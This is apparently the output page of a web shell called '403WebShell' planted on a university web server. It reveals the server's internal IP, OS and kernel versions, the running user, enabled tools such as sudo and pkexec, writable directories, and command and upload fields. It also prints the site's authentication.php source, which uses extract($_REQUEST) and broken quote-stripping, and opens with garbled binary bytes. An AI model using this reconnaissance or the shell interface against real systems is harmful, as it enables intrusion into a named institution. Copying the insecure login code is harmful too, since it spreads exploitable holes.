h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell
403Webshell
Server IP : 10.254.12.21  /  Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/ws/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/html/ws/authentication.php
<?php
class Authentication {
    /*private $conn;

    // Constructor สำหรับเชื่อมต่อฐานข้อมูล
    public function __construct($servername, $username, $password, $dbname) {
        $this->conn = new mysqli($servername, $username, $password, $dbname);

        // ตรวจสอบการเชื่อมต่อ
        if ($this->conn->connect_error) {
            die("Database connection failed: " . $this->conn->connect_error);
        }
    }*/

    // Method สำหรับตรวจสอบข้อมูลผู้ใช้
    //public function Authenticate(string $username, string $password): bool {
	public function Authenticate($usr, $pwd) {
        /*// เตรียมคำสั่ง SQL เพื่อป้องกัน SQL Injection
        $stmt = $this->conn->prepare("SELECT password FROM users WHERE username = ?");
        $stmt->bind_param("s", $username);
        $stmt->execute();
        $stmt->bind_result($hashedPassword);

        // ตรวจสอบผลลัพธ์
        if ($stmt->fetch()) {
            $stmt->close();
            // ตรวจสอบรหัสผ่าน
            return password_verify($password, $hashedPassword);
        } else {
            $stmt->close();
            return false; // ไม่พบผู้ใช้
        }*/

		extract($_REQUEST, EXTR_OVERWRITE);
		//session_start();
		error_reporting(0);
		//include("dbconnect.php");
		$date=date("Y-m-d H:i:s" ,mktime(date('H'),date("i"),date("s"),date("m"),date("d"),date("Y")));//วันที่ปัจจุบัน
		//---------------------ตรวจสอบค่า ip address-----------------------------------
		if ($_SERVER['HTTP_CLIENT_IP']) {
			$_IPADDRESS = $_SERVER['HTTP_CLIENT_IP'];
		}else if (ereg("[0-9]",$_SERVER['HTTP_X_FORWARDED_FOR'] )) {
			$_IPADDRESS = $_SERVER['HTTP_X_FORWARDED_FOR'];
		} else {
			$_IPADDRESS = $_SERVER['REMOTE_ADDR'];
		}
		define('_IP',$_IPADDRESS) ;
		//---------------------end ตรวจสอบค่า ip address-----------------------------------
	
		//$usr=$_POST['txtUser'];
		//$pwd=$_POST['txtPassword'];
		$UserName=str_replace("\"","****",$usr);
		$UserName=str_replace("'","****",$usr); 
		$Password=str_replace("\"","****",$pwd);
		$Password=str_replace("'","****",$pwd);
		$USERID="";
		
		$system='selectbook';//ชื่อระบบให้เจ้าหน้าที่ตั้งชื่อภาษาอังกฤษ
		$linksystem='http://arit.skru.ac.th/lib/openserve2022';//ลิงค์ของระบบ เช่น https://invent.skru.ac.th
		/**----------------------end ค่าที่ใช้ในการตรวจสอบ login------------------------------------------------**/
	
		$ipaddress= _IP;//ค่า ipaddress ดึงมาจากเครื่อง server	*/
		$dataset = array('user' => $UserName, 'pass' => $Password, 'ipaddress' => $ipaddress ,'system' => $system , 'link' => $linksystem); //ตัวแปรที่ถูกส่งไปยัง jsoncode   ในเครื่อง passport/ad-wifi
		$options = array( 
							'http' => array( 
							'method' => 'POST', 
							'content' => http_build_query($dataset)) 
						); 				
		$stream = stream_context_create($options);//สำหรับส่งตัวแปรไปยัง json ในเครื่อง passport/ad-wifi
		
		//$usertype=$_POST['usertype'];
		//if ($usertype=='staff') {
		if (strpos($UserName, '.')) {  //เช็คว่าเป็นบุคลากร หรือนักศึกษา ถ้ามี . เป็นบุคลากร
			//-----------------------------------------------------สำหรับเจ้าหน้าที่ บุคลากรของมหาวิทยาลัย--------------------------------//
			$url_staff='https://passport.skru.ac.th/ad-wifi/connect-staff.php';
			$homepage_staff=file_get_contents($url_staff, false, $stream);//ตรวจสอบข้อมูล
			$obj_s = json_decode($homepage_staff);
			foreach($obj_s as $vals){
					$STAFFID=$vals->{'STAFFID'}; //รหัสบุคลากร   
					$USERID=$STAFFID;//รหัสบุคลการ
					$USERNAME=$vals->{'LOGIN'}; //username เช่น somsak.lo
					$CPREFIXNAME=$vals->{'CPREFIXNAME'}; //คำนำหน้าชื่อ นาย นาง นางสาว
					$PREFIXNAME=$vals->{'PREFIXNAME'}; //คำนำหน้าชื่อ คือ ตำแหน่งทางวิชาการ เช่น ดร.  , ผศ.ดร. รองศาสตราจารย์
					$STAFFNAME=$vals->{'STAFFNAME'}; //ชื่อ
					$STAFFSURNAME=$vals->{'STAFFSURNAME'}; //นามสกุล
					$FULLNAME=$PREFIXNAME.$STAFFNAME.'  '.$STAFFSURNAME;//ชื่อ-สกุล  ชื่อเต็ม
					$FACULTYID=$vals->{'DEPARTMENTID'}; //รหัสหน่วยงาน
					$FACULTYNAME=$vals->{'DEPARTMENTNAME'}; //ชื่อหน่วยงาน
					$POSITIONNAME=$vals->{'POSITIONNAME'}; //ชื่อตำแหน่ง
					$STAFFGROUP=$vals->{'STAFFGROUP'}; //ประเภทบุคลากร  คือ 1=สายวิชาการ  , 2=สายสนับสนุน
					$MAIL=$USERNAME.'@skru.ac.th';//อีเมล
			}
			$STATUS_STAFF=$STAFFGROUP;	
			if($STATUS_STAFF=='1'){
				  $TYPE_STAFF='บุคลากรสายวิชาการ';
			}else if($STATUS_STAFF=='2'){
				  $TYPE_STAFF='บุคลากรสายสนับสนุน';
			}
			if($USERID !=''){//กรณี username และ password ถูกต้อง
				return true;	
			} else { //if($USERID !='')
				return false;
			} //if($USERID !='')
		//} elseif ($usertype=='student') { //if ($usertype=='staff') {
		} else { //if (strpos($UserName, '.')) ไม่มี . เป็นนักศึกษา
		//-----------------------------------------------------สำหรับนักศึกษาของมหาวิทยาลัย--------------------------------//
			$url='https://passport.skru.ac.th/ad-wifi/connect-std.php';
			$homepage=file_get_contents($url, false, $stream);//ตรวจสอบข้อมูล
			$obj = json_decode($homepage);
			foreach($obj as $val){
				
									$USERID=$val->{'USERID'}; //รหัสนักศึกษา
									$USERNAME=$val->{'STUDENTCODE'}; //รหัสนักศึกษา
									$FULLNAME=$val->{'FULLNAME'};//ชื่อ-สกุล
									$FACULTYID=$val->{'FACULTYID'};//รหัสคณะ
									$FACULTYNAME=$val->{'FACULTYNAME'};//ชื่อคณะ
									$PROGRAMCODE=$val->{'PROGRAMCODE'};//รหัสสาขาวิชา
									$PROGRAMCODENAME=$val->{'PROGRAMCODENAME'};//ชื่อโปรแกรมวิชา
									$MAIL=$USERNAME.'@parichat.skru.ac.th';
			}//end for*/
			if($USERID !=''){//กรณี username และ password ถูกต้อง
				return true;
			} else { //if($USERID !='')
				return false;
			}//if($USERID !='')
		} //if (strpos($UserName, '.'))
		
    }

    /*// Destructor สำหรับปิดการเชื่อมต่อฐานข้อมูล
    public function __destruct() {
        $this->conn->close();
    }*/
}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit